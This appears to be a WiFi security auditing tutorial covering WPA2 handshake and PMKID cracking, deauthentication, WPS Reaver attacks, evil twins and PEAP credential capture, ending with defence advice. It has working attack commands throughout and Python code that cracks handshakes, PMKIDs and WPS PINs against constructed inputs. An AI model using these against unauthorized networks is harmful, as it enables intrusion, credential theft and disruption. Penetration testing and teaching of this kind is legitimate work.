Wireless network security auditing is a critical component of any comprehensive penetration test. Most organizations have WiFi networks, and poorly secured wireless access creates an entry point that bypasses expensive perimeter defenses entirely. This guide covers the technical depth of WiFi auditing from WPA2 handshake capture to WPA3 limitations and enterprise network testing.
Legal reminder: WiFi auditing without explicit written authorization is illegal under computer fraud laws in virtually every jurisdiction. Only audit networks you own or have documented permission to test.
Equipment Requirements
Not every wireless adapter supports monitor mode and packet injection — the two capabilities required for WiFi auditing.
Recommended adapters for auditing:
- Alfa AWUS036ACH — AC1200, monitor mode, injection support, widely used
- Alfa AWUS036ACS — AC600, compact, excellent compatibility
- Panda PAU09 — Budget option, reliable monitor mode
- Hak5 WiFi Coconut — 14 simultaneous radios, ideal for channel monitoring
Check your adapter’s capabilities:
iw list | grep -A 10 "Supported interface modes"
You need to see monitor in the list. iw does not report injection support, so verify that separately once monitor mode is up with aireplay-ng --test wlan0mon.
WPA2 vs WPA3: What Changed
Understanding the protocol differences informs which attacks apply.
| Feature | WPA2-PSK | WPA3-SAE |
|---|---|---|
| Key exchange | 4-way handshake (EAPOL) using a PMK derived directly from the passphrase | Simultaneous Authentication of Equals (SAE/Dragonfly) negotiates a fresh PMK, then the 4-way handshake runs |
| Offline cracking | Yes: capture the handshake, test guesses offline | No: SAE is a PAKE, so each guess costs a live exchange with the AP |
| PMKID attack | Yes | No: the PMK is negotiated per session, so the PMKID does not verify a passphrase guess |
| Forward secrecy | No: a recovered PSK decrypts previously captured sessions | Yes |
| Deauth attacks | Effective | Protected Management Frames (802.11w, mandatory in WPA3) discards unauthenticated deauth frames |
| Dictionary attacks | Viable against weak PSKs | Only online, rate-limited by the AP |
WPA3 is significantly more resistant to password-based attacks. In practice, many WPA3 networks also run WPA2 in "transition mode" for compatibility, and both use the same passphrase: the WPA2 attacks below still work against the WPA2 BSS, and the password they recover is also the WPA3 password.
Setting Up Monitor Mode
# Check wireless interfaces
iwconfig
ip link show
# Stop the processes that would flip the card back to managed mode (NetworkManager, wpa_supplicant)
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Verify monitor mode is active
iwconfig wlan0mon
The interface is now wlan0mon (or still wlan0, switched to monitor mode, depending on the driver). Run check kill before start; killing NetworkManager afterwards is too late if it has already reset the interface.
Reconnaissance: Scanning for Networks
sudo airodump-ng wlan0mon
The output shows:
BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -45 89 123 6 130 WPA2 CCMP PSK TargetNetwork
11:22:33:44:55:66 -72 12 2 11 130 WPA3 CCMP SAE HomeWifi
Focus on:
- ENC / CIPHER / AUTH: WPA2 CCMP PSK is a handshake-capture target; AUTH MGT means enterprise/802.1X, SAE means WPA3
- CH: Channel. Lock to the target's channel for capture
- PWR: Signal strength in dBm. Values closer to zero (-45) are stronger than more negative ones (-72)
4-Way Handshake Capture
The 4-way handshake (EAPOL-Key messages 1 to 4) runs after a client associates and proves to both sides that they hold the PMK derived from the passphrase. Crackers need the AP's ANonce and a MIC-carrying message from the client, so messages 1 and 2 (or 2 and 3) are enough. Once captured, the handshake lets you verify password guesses offline with no further contact with the network.
Passive Capture (Wait for Client)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Flags:
-c 6 — Lock to channel 6 (the target AP’s channel)
--bssid AA:BB:CC:DD:EE:FF — Filter to target AP only
-w capture — Write to files named capture-01.cap, etc.
Wait for a client to connect or reconnect. When a handshake is captured, airodump-ng displays WPA handshake: AA:BB:CC:DD:EE:FF in the top right.
Active Deauthentication Attack
Force clients to reconnect by sending deauthentication frames:
# Deauth all clients from the AP
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Deauth a specific client
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
-0 10 — Send 10 rounds of deauthentication frames (0 for continuous until stopped)
-a — AP BSSID
-c — Client MAC address (optional; omit to deauth all clients)
Run this while airodump-ng is still locked on the target channel: the deauthenticated clients reconnect and airodump-ng records the handshake. Keep the count low. Repeated deauth floods disrupt the client's session and stand out in wireless IDS logs.
WPA3 note: WPA3 requires Protected Management Frames (PMF/802.11w), so clients ignore deauthentication frames that are not protected by the session key. WPA2 networks with PMF set to required behave the same way, which makes a small deauth burst a quick check of whether PMF is enforced.
Cracking the Handshake
With capture-01.cap captured, crack it with aircrack-ng:
aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt
Or with hashcat (faster with GPU):
# Convert to hashcat format
hcxpcapngtool -o capture.hc22000 capture-01.cap
# Crack with hashcat mode 22000
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt
Mode 22000 handles both EAPOL (handshake MIC) and PMKID records in one unified format; it replaced the older hccapx and PMKID formats (modes 2500 and 16800) in hashcat 6.0.
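What aircrack-ng and hashcat actually do with a captured handshake is the derivation chain passphrase -> PMK -> PTK -> KCK -> MIC, repeated per guess until the computed MIC matches the one in the captured EAPOL frame. The block below is an added example, not code from the original guide or from the aircrack-ng project; it implements that chain for WPA2/CCMP (key descriptor version 2, HMAC-SHA1 MIC). The SSID, MAC addresses, nonces and the EAPOL message 2 frame are constructed in the code so it runs without a real capture.

```python
import hashlib
import hmac
import struct

# Added example (not from the original guide): offline verification of passphrase
# guesses against a WPA2-PSK 4-way handshake. All inputs below are constructed.
SSID = "TargetNetwork"                        # constructed ESSID
AP_MAC = bytes.fromhex("aabbccddeeff")        # constructed BSSID
STA_MAC = bytes.fromhex("112233445566")       # constructed client MAC
ANONCE = hashlib.sha256(b"constructed anonce").digest()  # 32-byte AP nonce (from message 1)
SNONCE = hashlib.sha256(b"constructed snonce").digest()  # 32-byte client nonce (from message 2)
# Standard RSN IE for WPA2-PSK/CCMP, carried as key data in message 2.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + IV (16) + RSC (8) + key ID (8) = offset of the 16-byte Key MIC field.
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """KCK = PTK[0:16], PTK = PRF-384(PMK, "Pairwise key expansion",
    min(AA, SPA) || max(AA, SPA) || min(ANonce, SNonce) || max(ANonce, SNonce))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_m2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2. Key info 0x010a = descriptor version 2, pairwise, MIC bit set."""
    body = struct.pack(">BHH", 2, 0x010A, 16)     # descriptor type RSN, key info, key length (CCMP)
    body += (1).to_bytes(8, "big")                 # replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, key RSC, key ID
    body += mic
    body += struct.pack(">H", len(RSN_IE)) + RSN_IE
    return struct.pack(">BBH", 1, 3, len(body)) + body        # EAPOL version 1, type 3 (EAPOL-Key)


def simulate_capture(passphrase: str) -> bytes:
    """Stand-in for a captured message 2: the frame a client using this passphrase would send."""
    kck = derive_kck(derive_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return build_eapol_m2(SNONCE, eapol_mic(kck, build_eapol_m2(SNONCE)))


def crack_handshake(eapol_m2: bytes, wordlist):
    """Per guess: PMK -> KCK -> MIC. A MIC match verifies the passphrase; returns it or None."""
    captured_mic = eapol_m2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        kck = derive_kck(derive_pmk(guess, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), captured_mic):
            return guess
    return None


if __name__ == "__main__":
    frame = simulate_capture("correct horse battery")
    print(crack_handshake(frame, ["password", "letmein", "correct horse battery"]))
```

The cost is dominated by the 4096-iteration PBKDF2 per guess, which is why the passphrase is the whole defense: the MIC check itself is cheap, and nothing about it rate-limits an attacker who holds the capture.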
PMKID Attack
The PMKID attack (published by Jens Steube, the hashcat author, in 2018) recovers a passphrase-dependent value from the first EAPOL frame the AP sends (message 1, in its RSN PMKID key data element). No client needs to be connected, and there is nothing to wait for: an association attempt from the attacker's own card is enough.
The PMKID is computed as:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP_MAC || Client_MAC)
where PMK is the PBKDF2 output of the passphrase and SSID, so a passphrase guess can be checked against it offline exactly as with a handshake MIC.
# Capture PMKID from all access points
sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --enable_status=1
# Target a specific AP
sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --filterlist_ap=target_bssid.txt --filtermode=2
Two caveats: hcxdumptool's command line changed across releases (-o, --enable_status and --filterlist_ap are pre-6.3 syntax; 6.3 writes with -w and filters with BPF expressions), so check hcxdumptool -h for the installed version. And the tool is active by default, transmitting association requests and deauthentications rather than just listening, so keep it pointed at in-scope BSSIDs.
Convert and Crack
hcxpcapngtool -o pmkid.hc22000 pmkid_capture.pcapng
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt
The PMKID attack is faster to set up than handshake capture since you don't need to wait for clients, but not every access point includes a PMKID in message 1. hcxdumptool also records any full handshakes it sees, and hcxpcapngtool emits both record types into the same .hc22000 file, so one hashcat run covers both.
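The following is an added example, not code from the original guide or from the hcxtools project. It implements the PMKID formula above, builds and parses the hashcat 22000 PMKID record that hcxpcapngtool produces (WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID_hex*** for type 01), and runs the dictionary loop that recovers the passphrase. The record is constructed in the code from an illustrative SSID, MAC pair and passphrase, so it runs without a capture.

```python
import hashlib
import hmac

# Added example (not from the original guide): PMKID computation and offline
# cracking of a hashcat 22000 PMKID record. Inputs are constructed below.
AP_MAC = bytes.fromhex("aabbccddeeff")    # constructed BSSID
STA_MAC = bytes.fromhex("112233445566")   # constructed client MAC (hcxdumptool's own address in practice)
SSID = "TargetNetwork"                    # constructed ESSID


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP_MAC || Client_MAC): first 16 bytes of the HMAC."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def make_hc22000_pmkid_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """hashcat 22000 record. Type 01 (PMKID) leaves the ANONCE, EAPOL and MESSAGEPAIR fields empty."""
    return "*".join(["WPA", "01", pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex(), "", "", ""])


def parse_hc22000_pmkid_line(line: str):
    """Return (pmkid, ap_mac, sta_mac, ssid) from a type 01 record; reject anything else."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError("not a hashcat 22000 record")
    if fields[1] != "01":
        raise ValueError("type 02 (EAPOL MIC) records need PTK derivation, not a PMKID check")
    pmkid, ap_mac, sta_mac = (bytes.fromhex(f) for f in fields[2:5])
    if len(pmkid) != 16 or len(ap_mac) != 6 or len(sta_mac) != 6:
        raise ValueError("malformed PMKID or MAC field")
    return pmkid, ap_mac, sta_mac, bytes.fromhex(fields[5]).decode()


def crack_pmkid(line: str, wordlist):
    """Dictionary attack: derive PMK per guess, recompute PMKID, compare. Returns the passphrase or None."""
    pmkid, ap_mac, sta_mac, ssid = parse_hc22000_pmkid_line(line)
    for guess in wordlist:
        if hmac.compare_digest(compute_pmkid(derive_pmk(guess, ssid), ap_mac, sta_mac), pmkid):
            return guess
    return None


# Constructed record standing in for a line from hcxpcapngtool's output.
SAMPLE_LINE = make_hc22000_pmkid_line(
    compute_pmkid(derive_pmk("summer2019", SSID), AP_MAC, STA_MAC), AP_MAC, STA_MAC, SSID
)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack_pmkid(SAMPLE_LINE, ["password", "letmein", "summer2019"]))
```

Compared with the handshake path, there is no PTK derivation and no frame reconstruction: one HMAC per guess after the PBKDF2, which is why hashcat's 22000 mode treats PMKID and EAPOL records as the same workload.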
WPS Vulnerabilities and Reaver
WPS (Wi-Fi Protected Setup) has a fundamental design flaw in PIN mode: the 8-digit PIN is validated in two halves. The AP's response to message M4 reveals whether the first four digits are right, its response to M6 whether the next three are, and the eighth digit is a checksum. That cuts the effective keyspace from 10^8 to 10^4 + 10^3 = 11,000 attempts at most, which is trivially brute-forceable.
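To make the 11,000 figure concrete, here is an added example (not code from the original guide or from Reaver) with the WPS PIN checksum as hostapd computes it and a two-phase brute force against a simulated registrar. The registrar is a constructed stand-in for a vulnerable AP: it answers a wrong first half at M4 and a wrong second half at M6, exactly the leak Reaver exploits. The secret PIN and the reply labels are illustrative.

```python
# Added example (not from the original guide): WPS PIN checksum and the
# two-phase brute force enabled by the M4/M6 half-PIN validation leak.


def wps_checksum(pin7: int) -> int:
    """Checksum digit for the first 7 digits: 3*(d1+d3+d5+d7) + (d2+d4+d6) + checksum is 0 mod 10.
    Same algorithm as hostapd's wps_pin_checksum(), walking digits from the right."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def build_pin(first_half: int, second_three: int) -> int:
    """Assemble an 8-digit PIN from a 4-digit first half, a 3-digit second half and the checksum."""
    pin7 = first_half * 1000 + second_three
    return pin7 * 10 + wps_checksum(pin7)


def make_registrar(secret_pin: int):
    """Simulated vulnerable AP (constructed). Its replies reveal which half of a guess was wrong."""
    def respond(guess: int) -> str:
        if guess // 10000 != secret_pin // 10000:
            return "M4-NACK"      # first half wrong: AP aborts after M4
        if guess != secret_pin:
            return "M6-NACK"      # first half right, second half wrong: AP aborts after M6
        return "M7"               # full PIN accepted, M7 would carry the network credentials
    return respond


def brute_force_pin(respond):
    """Phase 1 tries up to 10^4 first halves, phase 2 up to 10^3 second halves.
    Returns (recovered_pin, attempts); (None, attempts) if the registrar never accepts."""
    attempts = 0
    for first in range(10_000):
        attempts += 1
        reply = respond(build_pin(first, 0))
        if reply == "M7":
            return build_pin(first, 0), attempts
        if reply == "M6-NACK":
            break
    else:
        return None, attempts
    for second in range(1_000):
        attempts += 1
        pin = build_pin(first, second)
        if respond(pin) == "M7":
            return pin, attempts
    return None, attempts


if __name__ == "__main__":
    # 12345670 is the well-known example PIN: checksum of 1234567 is 0.
    print(brute_force_pin(make_registrar(12345670)))
```

The worst case is exactly 10,000 + 1,000 attempts; against a real AP, Reaver's -d and -t flags below exist because each attempt is a full EAP exchange and many APs lock WPS after a handful of failures.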
Checking for WPS
sudo wash -i wlan0mon
Output shows WPS-enabled networks and whether they’re locked (WPS Locked = 1 means Reaver attacks will likely fail).
Reaver WPS PIN Attack
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
Key flags:
-vv — Verbose output
-d 1 — Delay between attempts (seconds)
-t 5 — Timeout per attempt (seconds)
-A / --no-associate — Don't associate with the AP; use when you handle association yourself, for example with aireplay-ng -1 fake authentication
# With rate limiting for cautious approach
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 2 -t 10
Pixie Dust attack: much faster than brute force. It exploits weak or predictable nonces in the WPS exchange on some AP chipsets, so the PIN can be computed offline from a single exchange. In the reaver-wps-fork-t6x build, -K 1 runs pixiewps on the captured values:
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vv
Modern routers that lock WPS after 3 to 5 failed attempts resist the brute force, and wash's locked flag tells you in advance. Many enterprise-grade APs have WPS disabled entirely.
Evil Twin Attack Concepts
An evil twin is a rogue access point with the same SSID as a legitimate network. When clients auto-connect (using saved networks), their traffic is routed through the attacker’s device.
The general setup involves:
- Rogue AP: Create an open (or WPA2) access point with the same SSID as the target
- Deauth target AP: Force clients to disconnect from the legitimate AP
- Client connects: Clients auto-connect to your evil twin
- Captive portal or MITM: Intercept credentials or traffic
Tools for evil twin setups:
- hostapd-wpe: Creates a rogue AP that captures enterprise (PEAP/LEAP) credentials
- airbase-ng: Part of the aircrack-ng suite for creating software APs
- Bettercap: Full-featured network attack framework with evil twin capabilities
- WiFi-Pumpkin: Framework specifically for rogue AP attacks
Evil twin attacks are particularly effective against enterprise networks using PEAP: clients configured not to validate the server certificate complete MSCHAPv2 with the rogue RADIUS server, handing over a challenge/response pair that cracks like NetNTLMv1.
Enterprise WiFi Security (802.1X)
Enterprise networks use 802.1X with a RADIUS server for authentication rather than a shared password. Each user authenticates with their own credentials.
PEAP/MSCHAPv2 Vulnerabilities
PEAP (Protected EAP) tunnels MSCHAPv2 inside TLS. The weakness: clients that don’t validate the server certificate will connect to any RADIUS server, including a rogue one.
hostapd-wpe creates a rogue RADIUS server that captures MSCHAPv2 challenges and responses:
sudo hostapd-wpe hostapd-wpe.conf
Captured exchanges look like this (constructed values; the challenge is 8 bytes and the MSCHAPv2 response 24 bytes):
username: DOMAIN\jsmith
challenge: 4f2e4f2e4f2e4f2e
response: a87d123456789012a87d123456789012a87d123456789012
hostapd-wpe also prints each exchange ready for the crackers: a jtr NETNTLM: line and a hashcat NETNTLM: line of the form username::::response:challenge. Crack with asleap, or with hashcat mode 5500 (NetNTLMv1, which shares MSCHAPv2's DES-based construction):
hashcat -m 5500 netntlm_hashes.txt /usr/share/wordlists/rockyou.txt
asleap -C 4f:2e:4f:2e:4f:2e:4f:2e -R a8:7d:12:34:56:78:90:12:a8:7d:12:34:56:78:90:12:a8:7d:12:34:56:78:90:12 -W /usr/share/wordlists/rockyou.txt
A wordlist is not strictly required: MSCHAPv2's response reduces to a single DES key, so the NT hash can be recovered by exhaustive 2^56 DES search (the chapcrack approach) regardless of password strength. Treat any captured exchange as a compromised credential.
Enterprise Defense Recommendations
- Certificate validation: Configure clients to validate the RADIUS server certificate against a specific CA, never "any trusted CA" and never "do not validate"
- Certificate pinning or server name matching: Pin the certificate, or at least restrict the accepted server name (wpa_supplicant domain_match, Windows "Connect to these servers"), so a valid certificate from a public CA is not enough for a rogue server
- EAP-TLS: Use mutual certificate authentication instead of password-based PEAP — eliminates credential capture attacks entirely
- Disable WPS: Turn it off on all access points
- WPA3-Enterprise: Upgrade to WPA3-Enterprise with 192-bit security mode for sensitive environments
Wireless auditing reveals misconfigurations that firewalls and endpoint controls can never compensate for. A strong WiFi password (20+ random characters), disabled WPS, validated certificate-based authentication, and WPA3 where possible forms the foundation of a defensible wireless posture.